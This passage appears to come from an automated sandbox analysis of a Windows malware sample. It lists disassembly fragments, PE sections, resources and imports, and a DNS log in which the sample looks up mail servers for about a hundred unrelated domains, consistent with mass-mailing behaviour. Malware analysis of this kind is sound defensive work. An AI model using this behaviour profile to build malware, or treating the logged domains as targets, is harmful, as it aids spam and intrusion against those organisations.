                                                                                                                                                                                                    xor eax, edx
                                                                                                                                                                                                    add ecx, 04h
                                                                                                                                                                                                    test eax, 81010100h
                                                                                                                                                                                                    je 00007FF9B8E7581Ah
                                                                                                                                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                    je 00007FF9B8E75864h
                                                                                                                                                                                                    test ah, ah
                                                                                                                                                                                                    je 00007FF9B8E75856h
                                                                                                                                                                                                    test eax, 00FF0000h
                                                                                                                                                                                                    je 00007FF9B8E75845h
                                                                                                                                                                                                    test eax, FF000000h
                                                                                                                                                                                                    je 00007FF9B8E75834h
                                                                                                                                                                                                    jmp 00007FF9B8E757FFh
                                                                                                                                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    push edi
                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov esi, 00401350h
                                                                                                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                                                                                                    rep movsd
                                                                                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                    pop edi
                                                                                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007FF9B8E7583Eh
                                                                                                                                                                                                    test byte ptr [eax], 00000008h
                                                                                                                                                                                                    je 00007FF9B8E75839h
                                                                                                                                                                                                    mov dword ptr [ebp-0Ch], 00000000h

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1d27e00x50.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2870000xd620.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39a00x40.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1c0.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x1d22420x1d2400False0.9661585748994638data7.957840457952121IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x1d40000xb2a840x1c00False0.2689732142857143data2.7898713730426747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .rsrc0x2870000xd6200xd800False0.3271484375DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 166153499473114484112975882535043072.0000004.185045380876816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                    RT_CURSOR0x28f9680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.2953091684434968
                                                                                                                                                                                                    RT_CURSOR0x2908100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.46705776173285196
                                                                                                                                                                                                    RT_CURSOR0x2910b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5361271676300579
                                                                                                                                                                                                    RT_CURSOR0x2916500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.26439232409381663
                                                                                                                                                                                                    RT_CURSOR0x2924f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.3686823104693141
                                                                                                                                                                                                    RT_CURSOR0x292da00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.49060693641618497
                                                                                                                                                                                                    RT_CURSOR0x2933380x130Device independent bitmap graphic, 32 x 64 x 1, image size 0EnglishUnited States0.4375
                                                                                                                                                                                                    RT_CURSOR0x2934680xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0EnglishUnited States0.44886363636363635
                                                                                                                                                                                                    RT_ICON0x2875d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3603411513859275
                                                                                                                                                                                                    RT_ICON0x2884780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4697653429602888
                                                                                                                                                                                                    RT_ICON0x288d200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.46390041493775935
                                                                                                                                                                                                    RT_ICON0x28b2c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.47162288930581614
                                                                                                                                                                                                    RT_ICON0x28c3700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.49556737588652483
                                                                                                                                                                                                    RT_ICON0x28c8280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.4153225806451613
                                                                                                                                                                                                    RT_ICON0x28cef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1783195020746888
                                                                                                                                                                                                    RT_ICON0x28f4980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22606382978723405
                                                                                                                                                                                                    RT_STRING0x2937780x648dataEnglishUnited States0.43283582089552236
                                                                                                                                                                                                    RT_STRING0x293dc00x378dataEnglishUnited States0.4605855855855856
                                                                                                                                                                                                    RT_STRING0x2941380x318dataEnglishUnited States0.4810606060606061
                                                                                                                                                                                                    RT_STRING0x2944500x1cadataEnglishUnited States0.4868995633187773
                                                                                                                                                                                                    RT_ACCELERATOR0x28f9300x38dataEnglishUnited States0.8928571428571429
                                                                                                                                                                                                    RT_GROUP_CURSOR0x2916200x30dataEnglishUnited States0.9375
                                                                                                                                                                                                    RT_GROUP_CURSOR0x2933080x30dataEnglishUnited States0.9375
                                                                                                                                                                                                    RT_GROUP_CURSOR0x2935180x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                    RT_GROUP_ICON0x28c7d80x4cdataEnglishUnited States0.75
                                                                                                                                                                                                    RT_GROUP_ICON0x28f9000x30dataEnglishUnited States0.9791666666666666
                                                                                                                                                                                                    RT_VERSION0x2935400x238dataEnglishUnited States0.5475352112676056

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    KERNEL32.dllTlsGetValue, SetLocalTime, GetConsoleAliasExesLengthA, FindResourceW, GlobalAddAtomA, GetConsoleAliasA, InitializeSListHead, CreateJobObjectW, SetComputerNameW, GetModuleHandleW, CreateNamedPipeW, GetConsoleAliasesA, GetWindowsDirectoryA, GetGeoInfoW, LoadLibraryW, ReadConsoleInputA, GetSystemWindowsDirectoryA, GetNamedPipeInfo, CreateFileW, GetVolumePathNameA, GetLastError, SetLastError, GetComputerNameA, VirtualAlloc, EnumDateFormatsExA, RemoveDirectoryA, SearchPathA, GetPrivateProfileStringA, OpenWaitableTimerW, LocalAlloc, CreateFileMappingW, GetNumberFormatW, SetConsoleWindowInfo, GetSystemInfo, GlobalFindAtomW, FindFirstVolumeMountPointA, FreeEnvironmentStringsW, EndUpdateResourceA, ReadConsoleInputW, GetWindowsDirectoryW, GetCurrentProcessId, GetConsoleProcessList, DebugActiveProcess, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, CloseHandle, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, HeapReAlloc, GetModuleHandleA, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetStdHandle, FlushFileBuffers, HeapSize, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA
                                                                                                                                                                                                    USER32.dllGetMessageExtraInfo, CharToOemBuffA
                                                                                                                                                                                                    GDI32.dllGetCharWidth32A, GetCharABCWidthsFloatW

                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.004465103 CET192.168.2.41.1.1.10x7f19Standard query (0)gethsemane.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.004698992 CET192.168.2.41.1.1.10x9ccaStandard query (0)lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.004976988 CET192.168.2.41.1.1.10x6c06Standard query (0)student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.005405903 CET192.168.2.41.1.1.10x41f0Standard query (0)killicit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.005650997 CET192.168.2.41.1.1.10x90fdStandard query (0)greenrworld.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.005990028 CET192.168.2.41.1.1.10xf6b6Standard query (0)aoiit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.006275892 CET192.168.2.41.1.1.10xcff4Standard query (0)paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.006745100 CET192.168.2.41.1.1.10x250fStandard query (0)townshipnjr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.006745100 CET192.168.2.41.1.1.10xc4e3Standard query (0)bunasta.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.007086039 CET192.168.2.41.1.1.10x2c79Standard query (0)gasp-ga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.015261889 CET192.168.2.41.1.1.10xe6dbStandard query (0)my.calvary.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.018467903 CET192.168.2.41.1.1.10xd978Standard query (0)knu.ac.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.022460938 CET192.168.2.41.1.1.10xeb93Standard query (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.045140982 CET192.168.2.41.1.1.10xbfe7Standard query (0)student.debritto.sch.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048140049 CET192.168.2.41.1.1.10x4c8fStandard query (0)bvhrs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048204899 CET192.168.2.41.1.1.10x5583Standard query (0)paintd.plus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048414946 CET192.168.2.41.1.1.10x35faStandard query (0)eco-landeck.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048583984 CET192.168.2.41.1.1.10xc3a4Standard query (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048661947 CET192.168.2.41.1.1.10x1ad4Standard query (0)cardenas.mtz.rimed.cuMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048877954 CET192.168.2.41.1.1.10x42c7Standard query (0)krkconcord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.048927069 CET192.168.2.41.1.1.10x7bc1Standard query (0)gethsemane.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.049220085 CET192.168.2.41.1.1.10x7f5eStandard query (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.052344084 CET192.168.2.41.1.1.10x365aStandard query (0)townshipnjr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.054670095 CET192.168.2.41.1.1.10xa78dStandard query (0)my.calvary.qld.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.054768085 CET192.168.2.41.1.1.10x38e0Standard query (0)t1eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.055088043 CET192.168.2.41.1.1.10x305dStandard query (0)eco-landeck.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.055440903 CET192.168.2.41.1.1.10x8dd0Standard query (0)knu.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.056381941 CET192.168.2.41.1.1.10x968dStandard query (0)esistem.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.056689978 CET192.168.2.41.1.1.10xa7c8Standard query (0)krkconcord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.057003975 CET192.168.2.41.1.1.10xbb39Standard query (0)cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.057821989 CET192.168.2.41.1.1.10x151aStandard query (0)t1eng.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.060333967 CET192.168.2.41.1.1.10xfc8bStandard query (0)lwindowelive.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.060410023 CET192.168.2.41.1.1.10x496aStandard query (0)greenrworld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.061840057 CET192.168.2.41.1.1.10x5f89Standard query (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.062242985 CET192.168.2.41.1.1.10x3c81Standard query (0)rdelealtad.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.062300920 CET192.168.2.41.1.1.10x1cf6Standard query (0)octetpowers.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.062903881 CET192.168.2.41.1.1.10x3e99Standard query (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.064069033 CET192.168.2.41.1.1.10x5101Standard query (0)rechagricola.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.064163923 CET192.168.2.41.1.1.10xcff3Standard query (0)esistem.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.064500093 CET192.168.2.41.1.1.10x263bStandard query (0)carelesscommunity.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.065857887 CET192.168.2.41.1.1.10x18e5Standard query (0)americanrecords.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.065990925 CET192.168.2.41.1.1.10xb9d9Standard query (0)aoiit.storeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.067384958 CET192.168.2.41.1.1.10x5f51Standard query (0)macisis.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.067576885 CET192.168.2.41.1.1.10xf2aeStandard query (0)edgewater.groupMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.067647934 CET192.168.2.41.1.1.10xed4bStandard query (0)gspousea.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.069452047 CET192.168.2.41.1.1.10x554aStandard query (0)rochester-gauges.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.071875095 CET192.168.2.41.1.1.10xbca9Standard query (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.072112083 CET192.168.2.41.1.1.10xee12Standard query (0)gruporegiosafety.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.073939085 CET192.168.2.41.1.1.10x1721Standard query (0)directlendersllc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.074201107 CET192.168.2.41.1.1.10xcd1bStandard query (0)avient.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.074314117 CET192.168.2.41.1.1.10xcfb8Standard query (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.074541092 CET192.168.2.41.1.1.10xcf16Standard query (0)wasserman.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.074656963 CET192.168.2.41.1.1.10xdfa9Standard query (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.074919939 CET192.168.2.41.1.1.10xaf49Standard query (0)sofia-communications.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.077327013 CET192.168.2.41.1.1.10x8704Standard query (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.079413891 CET192.168.2.41.1.1.10x1eb4Standard query (0)jamiesonmullin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.079539061 CET192.168.2.41.1.1.10xf4dcStandard query (0)wonka.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.080050945 CET192.168.2.41.1.1.10x8c4bStandard query (0)sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.082374096 CET192.168.2.41.1.1.10x615cStandard query (0)lgs-strategies.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.082726955 CET192.168.2.41.1.1.10xbb2dStandard query (0)directlendersllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.083158016 CET192.168.2.41.1.1.10x8980Standard query (0)daisyokogyo.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.083367109 CET192.168.2.41.1.1.10x9efcStandard query (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.083897114 CET192.168.2.41.1.1.10xc10fStandard query (0)jamiesonmullin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.088761091 CET192.168.2.41.1.1.10x7c50Standard query (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.090339899 CET192.168.2.41.1.1.10x7567Standard query (0)dstaq.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.091118097 CET192.168.2.41.1.1.10xff82Standard query (0)yahoo.comfreezedMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.091634035 CET192.168.2.41.1.1.10x8f7dStandard query (0)mdystudent.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.092367887 CET192.168.2.41.1.1.10x28a3Standard query (0)schor.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.094958067 CET192.168.2.41.1.1.10x9771Standard query (0)pixiil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.101593971 CET192.168.2.41.1.1.10x1806Standard query (0)ondania.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.120064974 CET192.168.2.41.1.1.10xc83aStandard query (0)hightideinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.120743036 CET192.168.2.41.1.1.10xd837Standard query (0)2l7g4s.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.121659994 CET192.168.2.41.1.1.10xf9a6Standard query (0)privatemoe.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.122195959 CET192.168.2.41.1.1.10x2701Standard query (0)bayambnag.gov.phMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.124308109 CET192.168.2.41.1.1.10x261eStandard query (0)cringemonster.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.124748945 CET192.168.2.41.1.1.10x9371Standard query (0)integraledu.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.126100063 CET192.168.2.41.1.1.10xf937Standard query (0)tradeavenida.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.126450062 CET192.168.2.41.1.1.10x6b7fStandard query (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.127222061 CET192.168.2.41.1.1.10xbb7fStandard query (0)grantstech.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.127901077 CET192.168.2.41.1.1.10x3d8cStandard query (0)gmail.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.128842115 CET192.168.2.41.1.1.10x383eStandard query (0)lumaruniformes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.131340981 CET192.168.2.41.1.1.10x466fStandard query (0)rdelealtad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.132989883 CET192.168.2.41.1.1.10xe813Standard query (0)talentius.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.133189917 CET192.168.2.41.1.1.10xf157Standard query (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.136945009 CET192.168.2.41.1.1.10x955eStandard query (0)xtsagency.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.145113945 CET192.168.2.41.1.1.10x1546Standard query (0)himontessori.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.216057062 CET192.168.2.41.1.1.10x89d4Standard query (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.216958046 CET192.168.2.41.1.1.10x7d1cStandard query (0)linkan-group.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.221251965 CET192.168.2.41.1.1.10x9540Standard query (0)bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.221945047 CET192.168.2.41.1.1.10x7b49Standard query (0)gasp-ga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.223115921 CET192.168.2.41.1.1.10xc043Standard query (0)bvhrs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.225862980 CET192.168.2.41.1.1.10x830bStandard query (0)rechagricola.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.226552010 CET192.168.2.41.1.1.10xb6adStandard query (0)gruporegiosafety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.226990938 CET192.168.2.41.1.1.10x52a6Standard query (0)esoft.academyMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.228199005 CET192.168.2.41.1.1.10x1907Standard query (0)octetpowers.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.229398966 CET192.168.2.41.1.1.10xf88bStandard query (0)micro-design.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.232182980 CET192.168.2.41.1.1.10x3ee7Standard query (0)wasserman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.233062983 CET192.168.2.41.1.1.10xb8c6Standard query (0)avient.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.236586094 CET192.168.2.41.1.1.10xd87dStandard query (0)hmichaelandco.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.243895054 CET192.168.2.41.1.1.10x3e42Standard query (0)students.kasralainy.edu.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.244719028 CET192.168.2.41.1.1.10xcd6bStandard query (0)lumaruniformes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.249351025 CET192.168.2.41.1.1.10xa17Standard query (0)ibright.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.259252071 CET192.168.2.41.1.1.10x5623Standard query (0)harasduberry.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262810946 CET192.168.2.41.1.1.10xc3bcStandard query (0)daisyokogyo.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.265153885 CET192.168.2.41.1.1.10x20e2Standard query (0)adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.268301010 CET192.168.2.41.1.1.10xd06eStandard query (0)nohonetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.273514986 CET192.168.2.41.1.1.10xcc41Standard query (0)carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.275744915 CET192.168.2.41.1.1.10xdf5aStandard query (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.278903008 CET192.168.2.41.1.1.10xaf1bStandard query (0)dstaq.comA (IP address)IN (0x0001)false
